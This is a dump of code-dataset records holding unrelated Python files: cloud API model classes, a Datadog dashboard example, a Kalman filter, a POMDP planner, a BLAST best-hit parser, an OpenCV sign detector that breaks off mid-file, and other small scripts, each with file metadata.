params.get(\"Name\")\n self.Value = params.get(\"Value\")\n\n\nclass DimensionsDesc(AbstractModel):\n \"\"\"维度信息\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Dimensions: 维度名数组\n :type Dimensions: list of str\n \"\"\"\n self.Dimensions = None\n\n\n def _deserialize(self, params):\n self.Dimensions = params.get(\"Dimensions\")\n\n\nclass GetMonitorDataRequest(AbstractModel):\n \"\"\"GetMonitorData请求参数结构体\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Namespace: 命名空间,每个云产品会有一个命名空间\n :type Namespace: str\n :param MetricName: 指标名称,各个云产品的详细指标说明请参阅各个产品[监控接口](https://cloud.tencent.com/document/product/248/30384)文档\n :type MetricName: str\n :param Instances: 实例对象的维度组合\n :type Instances: list of Instance\n :param Period: 监控统计周期。默认为取值为300,单位为s\n :type Period: int\n :param StartTime: 起始时间,如2018-09-22T19:51:23+08:00\n :type StartTime: str\n :param EndTime: 结束时间,默认为当前时间。 
EndTime不能小于EtartTime\n :type EndTime: str\n \"\"\"\n self.Namespace = None\n self.MetricName = None\n self.Instances = None\n self.Period = None\n self.StartTime = None\n self.EndTime = None\n\n\n def _deserialize(self, params):\n self.Namespace = params.get(\"Namespace\")\n self.MetricName = params.get(\"MetricName\")\n if params.get(\"Instances\") is not None:\n self.Instances = []\n for item in params.get(\"Instances\"):\n obj = Instance()\n obj._deserialize(item)\n self.Instances.append(obj)\n self.Period = params.get(\"Period\")\n self.StartTime = params.get(\"StartTime\")\n self.EndTime = params.get(\"EndTime\")\n\n\nclass GetMonitorDataResponse(AbstractModel):\n \"\"\"GetMonitorData返回参数结构体\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Period: 统计周期\n :type Period: int\n :param MetricName: 指标名\n :type MetricName: str\n :param DataPoints: 数据点数组\n :type DataPoints: list of DataPoint\n :param StartTime: 开始时间\n :type StartTime: str\n :param EndTime: 结束时间\n :type EndTime: str\n :param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。\n :type RequestId: str\n \"\"\"\n self.Period = None\n self.MetricName = None\n self.DataPoints = None\n self.StartTime = None\n self.EndTime = None\n self.RequestId = None\n\n\n def _deserialize(self, params):\n self.Period = params.get(\"Period\")\n self.MetricName = params.get(\"MetricName\")\n if params.get(\"DataPoints\") is not None:\n self.DataPoints = []\n for item in params.get(\"DataPoints\"):\n obj = DataPoint()\n obj._deserialize(item)\n self.DataPoints.append(obj)\n self.StartTime = params.get(\"StartTime\")\n self.EndTime = params.get(\"EndTime\")\n self.RequestId = params.get(\"RequestId\")\n\n\nclass Instance(AbstractModel):\n \"\"\"实例维度组合数组\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Dimensions: 实例的维度组合\n :type Dimensions: list of Dimension\n \"\"\"\n self.Dimensions = None\n\n\n def _deserialize(self, params):\n if params.get(\"Dimensions\") is not None:\n self.Dimensions = []\n for item in params.get(\"Dimensions\"):\n obj = Dimension()\n obj._deserialize(item)\n self.Dimensions.append(obj)\n\n\nclass MetricObjectMeaning(AbstractModel):\n \"\"\"指标数据的解释\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param En: 指标英文解释\n :type En: str\n :param Zh: 指标中文解释\n :type Zh: str\n \"\"\"\n self.En = None\n self.Zh = None\n\n\n def _deserialize(self, params):\n self.En = params.get(\"En\")\n self.Zh = params.get(\"Zh\")\n\n\nclass MetricSet(AbstractModel):\n \"\"\"对业务指标的单位及支持统计周期的描述\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Namespace: 命名空间,每个云产品会有一个命名空间\n :type Namespace: str\n :param MetricName: 指标名称\n :type MetricName: str\n :param Unit: 指标使用的单位\n :type Unit: str\n :param UnitCname: 指标使用的单位\n :type UnitCname: str\n :param Period: 指标支持的统计周期,单位是秒,如60、300\n :type Period: list of int\n :param Periods: 统计周期内指标方式\n :type Periods: list of PeriodsSt\n :param Meaning: 统计指标含义解释\n :type Meaning: :class:`tencentcloud.monitor.v20180724.models.MetricObjectMeaning`\n :param Dimensions: 维度描述信息\n :type Dimensions: list of DimensionsDesc\n \"\"\"\n self.Namespace = None\n self.MetricName = None\n self.Unit = None\n self.UnitCname = None\n self.Period = None\n self.Periods = None\n self.Meaning = None\n self.Dimensions = None\n\n\n def _deserialize(self, params):\n self.Namespace = params.get(\"Namespace\")\n self.MetricName = params.get(\"MetricName\")\n self.Unit = params.get(\"Unit\")\n self.UnitCname = params.get(\"UnitCname\")\n self.Period = params.get(\"Period\")\n if params.get(\"Periods\") is not None:\n self.Periods = []\n for item 
in params.get(\"Periods\"):\n obj = PeriodsSt()\n obj._deserialize(item)\n self.Periods.append(obj)\n if params.get(\"Meaning\") is not None:\n self.Meaning = MetricObjectMeaning()\n self.Meaning._deserialize(params.get(\"Meaning\"))\n if params.get(\"Dimensions\") is not None:\n self.Dimensions = []\n for item in params.get(\"Dimensions\"):\n obj = DimensionsDesc()\n obj._deserialize(item)\n self.Dimensions.append(obj)\n\n\nclass PeriodsSt(AbstractModel):\n \"\"\"周期内的统计方式\n\n \"\"\"\n\n def __init__(self):\n \"\"\"\n :param Period: 周期\n :type Period: str\n :param StatType: 统计方式\n :type StatType: list of str\n \"\"\"\n self.Period = None\n self.StatType = None\n\n\n def _deserialize(self, params):\n self.Period = params.get(\"Period\")\n self.StatType = params.get(\"StatType\")","sub_path":"tencentcloud/monitor/v20180724/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":10105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"342197793","text":"\"\"\"\nCreate a new dashboard with manage_status widget\n\"\"\"\n\nfrom datadog_api_client import ApiClient, Configuration\nfrom datadog_api_client.v1.api.dashboards_api import DashboardsApi\nfrom datadog_api_client.v1.model.dashboard import Dashboard\nfrom datadog_api_client.v1.model.dashboard_layout_type import DashboardLayoutType\nfrom datadog_api_client.v1.model.monitor_summary_widget_definition import MonitorSummaryWidgetDefinition\nfrom datadog_api_client.v1.model.monitor_summary_widget_definition_type import MonitorSummaryWidgetDefinitionType\nfrom datadog_api_client.v1.model.widget import Widget\nfrom datadog_api_client.v1.model.widget_color_preference import WidgetColorPreference\nfrom datadog_api_client.v1.model.widget_layout import WidgetLayout\nfrom datadog_api_client.v1.model.widget_monitor_summary_display_format import WidgetMonitorSummaryDisplayFormat\nfrom datadog_api_client.v1.model.widget_monitor_summary_sort import WidgetMonitorSummarySort\nfrom datadog_api_client.v1.model.widget_summary_type import WidgetSummaryType\n\nbody = Dashboard(\n title=\"Example-Dashboard\",\n description=\"\",\n widgets=[\n Widget(\n layout=WidgetLayout(\n x=0,\n y=0,\n width=50,\n height=25,\n ),\n definition=MonitorSummaryWidgetDefinition(\n type=MonitorSummaryWidgetDefinitionType.MANAGE_STATUS,\n summary_type=WidgetSummaryType.MONITORS,\n display_format=WidgetMonitorSummaryDisplayFormat.COUNTS_AND_LIST,\n color_preference=WidgetColorPreference.TEXT,\n hide_zero_counts=True,\n show_last_triggered=False,\n query=\"\",\n sort=WidgetMonitorSummarySort.STATUS_ASCENDING,\n count=50,\n start=0,\n ),\n ),\n ],\n template_variables=[],\n layout_type=DashboardLayoutType.FREE,\n is_read_only=False,\n notify_list=[],\n)\n\nconfiguration = Configuration()\nwith ApiClient(configuration) as api_client:\n api_instance = DashboardsApi(api_client)\n response = api_instance.create_dashboard(body=body)\n\n print(response)\n","sub_path":"examples/v1/dashboards/CreateDashboard_2917274132.py","file_name":"CreateDashboard_2917274132.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155804561","text":"from typing import List\n\nclass Solution:\n #时间复杂度 O(N) : 其中 N 为列表 pushed 的长度;每个元素最多入栈与出栈一次,即最多共 2N 次出入栈操作。\n #空间复杂度 O(N) : 辅助栈 stack 最多同时存储 NN 个元素。\n\n def validateStackSequences(self, pushed: List[int], popped: List[int]) -> bool:\n stack, i = [], 0 #stack辅助栈\n for num in pushed:\n stack.append(num) # 
num 入栈\n while stack and stack[-1] == popped[i]: # 如果栈顶一样 循环判断与出栈\n stack.pop()\n i += 1 #把i +1,指向下一个popped的值\n return not stack\n\n","sub_path":"Offer/Offer31-validateStackSequences.py","file_name":"Offer31-validateStackSequences.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407812493","text":"import rospy\nimport numpy as np\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Twist\n\n\nclass KalmanFilter():\n def __init__(self, position, velocity):\n self.step_time = 0.1\n self.X0 = self.get_numpy_state(position, velocity)\n self.P0 = 0.001 * np.eye(4) # Ne znam kako izgleda pocetna matrica\n self.Q = 0.1 * np.eye(4)\n self.R = 0.001 * np.eye(2)\n\n T = self.step_time\n self.A = np.array([[1, 0, T, 0], [0, 1, 0, T], [0, 0, 1, 0], [0, 0, 0, 1]])\n self.B = np.array([[]])\n self.H = np.array([[1, 0, 0, 0], [0, 1, 0, 0]])\n\n self.X_old = self.X0\n self.P_old = self.P0\n\n def get_numpy_state(self, position, velocity=Twist()):\n \"\"\"Convert from some type (here: ROS msg) to numpy array.\"\"\"\n x = position.position.x\n y = position.position.y\n vx = velocity.linear.x\n vy = velocity.linear.y\n state = np.array([[x, y, vx, vy]])\n return state.T\n\n def get_used_state(self, np_state):\n \"\"\"Convert from numpy array to type used elswhere (here: ROS msg).\"\"\"\n time = rospy.Time.now()\n msg = Odometry()\n msg.header.stamp = time\n msg.pose.pose.position.x = np_state[0][0]\n msg.pose.pose.position.y = np_state[1][0]\n msg.twist.twist.linear.x = np_state[2][0]\n msg.twist.twist.linear.y = np_state[3][0]\n return msg\n\n def predict(self, u):\n \"\"\"\n Args:\n u: input vector\n \"\"\"\n X_est = np.dot(self.A, self.X_old)\n P_est = np.dot(np.dot(self.A, self.P_old), self.A.T) + self.Q\n\n self.X_old = X_est\n self.P_old = P_est\n\n return X_est, P_est\n\n def update(self, X_est, P_est, Xm):\n \"\"\"\n Args:\n Xm: measured state\n X_est: estimated state from prediction step\n P_est: estimated covariance matrix from prediction step\n \"\"\"\n Xm = self.get_numpy_state(Xm)\n K = np.dot(np.dot(P_est, self.H.T), np.linalg.inv(np.dot(np.dot(self.H, P_est), self.H.T) + self.R))\n Y = np.dot(self.H, Xm)\n X_new = X_est + np.dot(K, (Y - np.dot(self.H, X_est)))\n P_new = np.eye(4) - np.dot(np.dot(K, self.H), P_est)\n\n self.X_old = X_new\n self.P_old = P_new\n\n return self.get_used_state(X_new)\n","sub_path":"scripts/kalman.py","file_name":"kalman.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"394679148","text":"import socket\nimport sys\n\n\n# Create a TCP/IP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# Connect the socket to the port where the server is listening\nserver_address = ('localhost', 10000)\nprint(sys.stderr, 'connecting to %s port %s' % server_address)\nsock.connect(server_address)\n\n# After the connection is established, data can be sent through the socket with sendall() and received with recv(), just as in the server.\n\ntry:\n # Send data\n # message = input()\n line = \"\"\"a = input('a=')\nprint(a)\"\"\"\n message = exec(line)\n\n # message = 'This is the message. 
It will be repeated.'\n print(sys.stderr, 'sending {}'.format(message))\n sock.sendall(message.encode('utf-8'))\n\n # Look for the response\n amount_received = 0\n amount_expected = len(message)\n\n while amount_received < amount_expected:\n data = sock.recv(1024)\n amount_received += len(data)\n print(sys.stderr, 'received {}'.format(data))\nfinally:\n print(sys.stderr, 'closing socket')\n sock.close()\n","sub_path":"Socket Programming/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407828869","text":"import numpy as np\nimport matplotlib.pyplot as plt\n# State 0 is facing towards the lava, State 1 is facing away from the lava.\n# Control actions are moving forward, moving backward (which are absorbing states) and turning around\n\ncontrol_action_rewards = np.array(\n [[-100,100,-1],\n [100,-50,-1]]).T\n\nmeasurement_probabilities = np.array(\n [[0.7, 0.3],\n [0.3, 0.7]]\n)\npx1_u_x2 = np.array(\n [[[0, 0], [0, 0]],\n [[0, 0], [0, 0]],\n [[0.8, 0.2],[0.2, 0.8]]]\n)\n\n# Line set for each control action\ndef calculate_policy(T, gamma):\n # Initial line set\n line_set = [[0,0]]\n for tau in range(T):\n print(tau)\n all_new_lines = []\n policy = {}\n v_kuzj = np.zeros((len(line_set),3,2,2))\n # Cycle through each line\n for k, line in enumerate(line_set):\n # Cycle through each control action\n for u in range(3):\n # Cycle through each measurement\n for z in range(2):\n # Cycle through each state\n for j in range(2):\n for i in range(2):\n vik = line[i]\n pz_xi = measurement_probabilities[z][i]\n pxi_u_xj = px1_u_x2[u][j][i]\n v_kuzj[k][u][z][j] += vik*pz_xi*pxi_u_xj\n for u in range(3):\n for k1, line1 in enumerate(line_set):\n for k2, line2 in enumerate(line_set):\n v = [0,0]\n for i in range(2):\n v[i] = gamma*(control_action_rewards[u][i] + v_kuzj[k1][u][0][i] + v_kuzj[k2][u][1][i])\n if abs(v[0]) == 100*gamma:\n policy[(v[0], v[1])] = u\n else:\n policy[(v[1], v[0])] = u\n all_new_lines.append(v)\n line_set = np.copy(all_new_lines)\n if tau==0:\n pruned_lines = line_set\n else:\n not_initial = np.argwhere(abs(line_set[:,0]) != gamma*100)\n line_set[not_initial] = np.flip(np.squeeze(line_set[not_initial]), axis=1)[:,None,:]\n # Prune the lines\n # Check for duplicates\n line_dict = {}\n next_lines = []\n for line_first in line_set:\n skip_line = False\n for check_line in next_lines:\n if np.allclose(line_first, check_line):\n skip_line = True\n break\n if skip_line:\n continue\n next_lines.append(line_first) \n # Keep dominant lines\n to_examine = next_lines[np.argmax(np.array(next_lines)[:,0])]\n pruned_lines = np.array([to_examine])\n start_x = 0\n finished = False\n remaining_linear_constraints = np.delete(next_lines, 1, axis=0)\n while not finished:\n # Check minimum intersecting lines\n m1 = np.repeat(to_examine[1]-to_examine[0], len(remaining_linear_constraints))\n b1 = np.repeat(to_examine[0], len(remaining_linear_constraints))\n m2 = remaining_linear_constraints[:,1] - remaining_linear_constraints[:,0]\n b2 = remaining_linear_constraints[:,0]\n delete_indices = np.where(np.isclose(m2-m1, 0))\n m1 = np.delete(m1, delete_indices, axis=0)\n b1 = np.delete(b1, delete_indices, axis=0)\n m2 = np.delete(m2, delete_indices, axis=0)\n b2 = np.delete(b2, delete_indices, axis=0)\n remaining_linear_constraints = np.delete(remaining_linear_constraints, delete_indices, axis=0)\n if len(remaining_linear_constraints) == 0:\n break\n x = (b1-b2)/(m2-m1)\n 
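# x holds the belief values where the current dominant line intersects\n            # each remaining candidate line; intersections left of start_x lie\n            # behind the left-to-right sweep over the upper envelope and are\n            # discarded just below.\n            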
delete_indices_2 = np.where(x < start_x)\n x = np.delete(x, delete_indices_2)\n remaining_linear_constraints = np.delete(remaining_linear_constraints, delete_indices_2, axis=0)\n if len(remaining_linear_constraints) == 0:\n break\n\n mins = np.argmin(x)\n candidates = remaining_linear_constraints[mins].reshape(-1,2)\n pruned_lines = np.concatenate((pruned_lines, candidates), axis=0)\n remaining_linear_constraints = np.delete(remaining_linear_constraints, mins, axis=0)\n to_examine = np.copy(candidates)[0]\n start_x = x[mins] \n line_set = np.copy(pruned_lines)\n for constraint in line_set:\n plt.plot([0,1], constraint)\n print(line_set)\n return policy, line_set\n\n\n\ndef take_measurement(actual_state):\n prob = np.random.random()\n if prob > 0.7:\n return int(not actual_state)\n else:\n return actual_state\n\ndef update_belief_after_measurement(p1, measured):\n if measured == 1:\n return (p1*0.7)/(0.4*p1+0.3)\n else: \n return (p1*0.3)/(-0.4*p1+0.7)\n\ndef update_belief_after_state_change(p1):\n return (-0.6*p1 + 0.8)\n\ndef take_step_u3(actual_state):\n prob = np.random.random()\n if prob > 0.8:\n return actual_state\n else:\n return int(not actual_state)\n\ndef simulate(steps, p1, actual_state, line_set, policy):\n reward = 0\n m = line_set[:,1] - line_set[:,0]\n b = line_set[:,0]\n for i in range(steps):\n measurement = take_measurement(actual_state)\n p1 = update_belief_after_measurement(p1, measurement)\n p0 = p1\n policy_line = line_set[np.argmax(m*p1 + b)]\n action_to_take = policy[(policy_line[0], policy_line[1])]\n reward += control_action_rewards[action_to_take][actual_state]\n if action_to_take == 0 or action_to_take == 1:\n break\n else: \n prev_state = actual_state\n actual_state = take_step_u3(actual_state)\n p1 = update_belief_after_state_change(p1)\n print(\"Step: {}, x_prev: {}, z: {}, p_after_measure: {}, x_after: {}, p_after_state_transition: {}\".format(i, prev_state, measurement, p0, actual_state, p1))\n print(\"Step: {}, measurement: {}, Final p1: {} Final Reward: {}\".format(i, measurement, p1, reward))\n\nif __name__ == \"__main__\":\n T=20\n gamma = 1.0\n policy, line_set = calculate_policy(T, gamma)\n plt.show()\n for i in range(10):\n simulate(T, 0.6, 1.0, line_set, policy)","sub_path":"pomdp_planning/pomdp.py","file_name":"pomdp.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"122007794","text":"\nimport time,re\n# current_time=time.localtime()\n# #print(current_time)\n# current_clock_time=time.strftime(\"%y/%m/%d-%H:%M:%S\")\n# print(current_clock_time)\nName=input(\"enter\")\nprice=input(\"enter\")\ndef valid_product(Name,price):\n val1=re.match(\"([a-z]+)([a-z]+)([a-z]+)$\",Name)\n val2=re.match(\"[0-9]{0,7}$\",price)\n if val1 and val2:\n return True\n else:\n return False\nprint(valid_product(Name,price))\n","sub_path":"day11/tt.py","file_name":"tt.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159981923","text":"## Script (Python) \"guard_cancelled_object\"\n##bind container=container\n##bind context=context\n##bind namespace=\n##bind script=script\n##bind subpath=traverse_subpath\n##parameters=\n##title=\n##\n\nwf_tool = context.portal_workflow\n\n# Can't do anything to the object if it's cancelled\nif wf_tool.getInfoFor(context, 'cancellation_state') == \"cancelled\":\n return False\n\nreturn 
True\n\n","sub_path":"bika/lims/skins/bika/guard_cancelled_object.py","file_name":"guard_cancelled_object.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"361105412","text":"#!/usr/bin/python3\n\nimport pandas as pd\nimport numpy as np\nimport requests, sys\nfrom itertools import combinations\n#import seaborn as sns\nfrom scipy import stats\nimport pickle\nfrom collections import Counter\nimport copy\nfrom scipy.stats import sem, t\nfrom scipy import mean\nimport re\nimport os\nimport gzip\nimport fileinput\n\n\n\"\"\"\nCheck the input parameters and save them in separate variables,\nexiting with an error if the usage is not correct.\n\"\"\"\n\nif len(sys.argv) == 4:\n    tags_file = sys.argv[1]\n    ref_species = sys.argv[2]\n    out_file = sys.argv[3]\nelse:\n    sys.exit(\"The usage should be: ./FinderSBH.py tags_file ref_species out_file\")\n\n# VARIABLES\nquery_species = \"\"\nSBH_dict = {}\nspecies_counter = {}\ncluster_dict = {}\n\n\"\"\"\nRead the TAGs file for each primate species used in the analysis\nand store it in a pandas DataFrame.\n\"\"\"\n\nSpecies_tags = pd.read_csv(tags_file, sep='\\t', low_memory=False)  # DataFrame creation\ncolnames = ['Target{}'.format(num) for num in range(1, len(Species_tags))]\nfinalnames = ['Query'] + colnames\nSBH_df = pd.DataFrame(columns=finalnames)\n\n\n\"\"\"\nFUNCTIONS\n\"\"\"\n\n\"\"\"\nStore all target species in a dictionary so as to keep a counter\nof unique species seen as best hits.\n\"\"\"\n\ndef store_target_species_count_in_dict(Species_df, reference):\n    target_species = Species_df['Species'].to_list()\n    print(reference)\n    target_species.remove(reference)\n    species_counter = {name:0 for name in target_species}\n    return species_counter\n\n\n\"\"\"\nThis function parses the clusters of sequences to retrieve all\nIDs from each cluster apart from the representative one.\n\"\"\"\n\ndef parse_cluster_file(clusters_file, clusters_dict):\n    with open(clusters_file, \"rt\") as in_fh:\n        id = \"\"\n        clustered = []\n        for line in in_fh:\n            line = line.rstrip()\n            if line.startswith(\">\") and not id:\n                continue\n            elif line.startswith(\">\"):\n                clusters_dict[representative] = clustered\n                id = \"\"\n                clustered = []\n            else:\n                id = line.split(\">\")[1].split(\".\")[0]\n                if line[-1] == \"*\":\n                    representative = id\n                else:\n                    clustered.append(id)\n        clusters_dict[representative] = clustered\n    return clusters_dict\n\n\n\"\"\"\nAnother function that identifies extra species by checking whether the\nID of a species matches any of the clusters, and retrieves all the other\ntarget IDs associated with it.\n\"\"\"\n\ndef check_all_species_in_cluster(ident, query, clusters_dict, best_hit_dict,\n                                 sp_counter):\n    sp_counter, best_hit_dict = include_only_best_hit_foreach_species_target(ident,\n        best_hit_dict, query, sp_counter)\n    if ident in clusters_dict:\n        for value in clusters_dict[ident]:\n            sp_counter, best_hit_dict = include_only_best_hit_foreach_species_target(value,\n                best_hit_dict, query, sp_counter)\n    return sp_counter, best_hit_dict\n\n\n\"\"\"\nHere, the function includes each species only once, as the best hit for our reference\nspecies. 
Then, with that in mind, it filters out species that appear more than once\nas hits for a given query entry.\n\"\"\"\n\n# FUNCTION TO INCLUDE EACH SPECIES ONLY ONCE (BEST HIT)\ndef include_only_best_hit_foreach_species_target(elem, best_hit_dict, query,\n                                                 sp_counter):\n    for item in Species_tags['Tag']:\n        if elem.startswith(item):\n            current_species = Species_tags.loc[Species_tags['Tag'] == item].Species.item()\n            if current_species in sp_counter:\n                if sp_counter[current_species] == 0:\n                    sp_counter[current_species] += 1\n                    best_hit_dict[query].append(elem)\n    return sp_counter, best_hit_dict\n\n\n\"\"\"\nLast function, to print the output in pandas format for the Query and\nTarget columns in our dataframe.\n\"\"\"\n\n# FUNCTION TO APPEND THE BEST HITS FOR ONE QUERY TO THE OUTPUT DATAFRAME\ndef append_out_BBHs_pandas_format(sbh_dict, sbh_df, query):\n    query_row = [query] + sbh_dict[query] + \\\n        list(np.repeat(np.nan, len(sbh_df.columns)-len(sbh_dict[query])-1))\n    sbh_df = sbh_df.append(pd.Series(query_row, index=sbh_df.columns),\n        ignore_index=True)\n    return sbh_df\n\n\n\n\"\"\"\nMAIN\n\"\"\"\n\nspecies_counter = store_target_species_count_in_dict(Species_tags, ref_species)\n\n#cluster_dict = parse_cluster_file(clust_file, cluster_dict)\n\ncount = 0\nin_fh = iter(sys.stdin)\nfor line in in_fh:\n    line = line.rstrip()\n    if line.startswith(\"Query=\") and query_species == \"\":\n        query_fields = line[7:].split(\" \")\n        query_species = \"_\".join(query_fields[0:1])\n        SBH_dict[query_species] = []\n    elif line.startswith(\"Query=\"):\n        SBH_df = append_out_BBHs_pandas_format(SBH_dict, SBH_df,\n            query_species)\n        query_fields = line[7:].split(\" \")\n        query_species = \"_\".join(query_fields[0:1])\n        SBH_dict[query_species] = []\n        species_counter = {k:0 for k in species_counter}\n    elif line.startswith(\"Sequences producing significant alignments\"):\n        next(in_fh)\n        line_new = next(in_fh).rstrip()\n        while (any(letter.isalnum() for letter in line_new)):\n            ID_fields = line_new.split(\" \")\n            ID = \"_\".join(ID_fields[2:3])\n            species_counter, SBH_dict = include_only_best_hit_foreach_species_target(ID, SBH_dict,\n                query_species, species_counter)\n            line_new = next(in_fh).rstrip()\n\n# Repeat this after the loop for the last homolog entry\nSBH_df = append_out_BBHs_pandas_format(SBH_dict, SBH_df,\n    query_species)\n#Print_SBHs_in_Pandas_format(SBH_dict, SBH_df, out_file)\nSBH_df.to_csv(out_file, sep=\"\\t\", index=False)\n","sub_path":"Orthologies_human_driven_refs/BlastP/BBHs/FinderSBH.py","file_name":"FinderSBH.py","file_ext":"py","file_size_in_byte":5650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"491461380","text":"### Edited by Hanlin Gu on 1/9/2020\n### Obtain the population of each conformation. 'result$.txt' is the revised version of '2nd_stage_brute_force_classification_result.dat' with the '@' characters removed.\n### 2nd_stage_brute_force_classification_result.dat has 9 columns: the 1st column is the frame number, the 2nd-7th columns are the distances to the three conformations in the two ranges (3 x 2 = 6 distances),\n### the 8th column is the minimum of those six distances, and the 9th column is the number of the conformation that will be assigned.
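\n### Example (hypothetical row, for illustration only): \"12  0.8 1.9 0.6 1.7 0.5 1.4  0.5  4\" -> the minimum of the six distances, 0.5, lands in column 8 and class 4 is assigned (closed conformation; even, so blue range).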
\n### Actually we have three conformations in two ranges here, i.e. 6 classes in total; the even-numbered classes are correct assignments and\n### represent the blue range, while the odd-numbered classes are wrong and represent the green range.\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef cal(path):\n    data = np.loadtxt(path)\n    print(data.shape)\n    open = 0\n    intermediate = 0\n    close = 0\n    distance = []\n    distance1 = []\n    distance2 = []\n    for i in range(data.shape[0]):\n        if data[i, 8] == 0:\n            open = open + 1\n            distance.append(data[i, 7])\n        if data[i, 8] == 2:\n            distance1.append(data[i, 7])\n            intermediate = intermediate + 1\n        if data[i, 8] == 4:\n            distance2.append(data[i, 7])\n            close = close + 1\n\n    plt.scatter(np.arange(len(distance)), distance)\n    plt.savefig('large_range_distribution.png')\n    plt.show()\n    print(close)\n    sum = open + close + intermediate\n    exp = [float(open / sum), float(intermediate / sum), float(close / sum)]\n    return exp\n\n\nif __name__ == '__main__':\n    path = ['result1.txt', 'result2.txt',\n            'result3.txt']\n    array = []\n    real = [0.4, 0.3, 0.3]\n\n    for i in range(3):\n        print(path[i])\n        exp = cal(path[i])\n        print(exp)\n        array.append(exp)\n        fig = plt.figure(num=1, figsize=(15, 8), dpi=80)\n        plt.title('proportion comparison')\n        plt.plot(np.arange(3), exp, color='y', label='experiment3')\n        plt.plot(np.arange(3), real, color='r', label='real')\n        plt.legend(loc='upper right')\n        plt.savefig('proportion_comparison')\n    mean = np.mean(array, 0)\n    rows = ['%d' % x for x in range(3)]\n    std = np.std(array, 0)\n\n    plt.cla()\n    columns = ('mean', 'std')\n    cell_text = np.transpose(np.array([mean, std]))\n    table = plt.table(cellText=cell_text,\n                      rowLabels=rows,\n                      colLabels=columns, loc='center')\n    table.scale(1, 4)\n    table.set_fontsize(14)\n    plt.axis('off')\n    plt.title('three score')\n    plt.savefig('comparison table')\n","sub_path":"two_stage_matching/analyze_population.py","file_name":"analyze_population.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"441060622","text":"import cv2 as cv\nimport time\nfrom imutils.video import VideoStream\nimport imutils\nimport pickle\nimport cv2\nimport dlib\nimport numpy as np\n\n\ndef detector(image):\n    frame = image\n    detector = dlib.fhog_object_detector('mysign.svm')\n    detector_light = dlib.fhog_object_detector('mytraffic_light.svm')\n    # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    rects = detector(frame, 0)\n    rects_light = detector_light(frame, 0)\n\n    if len(rects) > 0:\n        for rect in rects:\n            (bX, bY, bW, bH) = (rect.left(), rect.top(), rect.right(), rect.bottom())\n            if bX < 0:\n                bX = 0\n            if bY < 0:\n                bY = 0\n            if bW < 0:\n                bW = 0\n            if bH < 0:\n                bH = 0\n\n            cv2.rectangle(frame, (bX, bY), (bW, bH), (255, 255, 255), 5)\n\n\n\n# vs = VideoStream(usePiCamera=True).start()\nvs = VideoStream(src=0).start()\ntime.sleep(2)\nwhile True:\n    frame = vs.read()\n    frame = imutils.resize(frame, width=750)\n    # frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n    frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    frame = cv2.GaussianBlur(frame, (5, 5), 0)\n\n    lap = cv2.Laplacian(frame, cv2.CV_64F)\n    lap = np.uint8(np.absolute(lap))\n    # cv2.imshow(\"Laplacian\", lap)\n    # cv2.waitKey(0)\n\n    # Sobel edge detection\n    sobelX = cv2.Sobel(frame, cv2.CV_64F, 1, 0)\n    sobelY = cv2.Sobel(frame, cv2.CV_64F, 0, 1)\n\n    sobelX = np.uint8(np.absolute(sobelX))\n    sobelY = np.uint8(np.absolute(sobelY))\n\n    sobelCombined = cv2.bitwise_or(sobelX, sobelY)\n    detector(sobelCombined)\n    
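# sobelCombined (displayed below) is the bitwise OR of the horizontal and\n    # vertical gradient magnitudes; np.absolute is applied first because the\n    # CV_64F outputs keep negative gradients that a plain uint8 cast would\n    # wrap around.\n    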
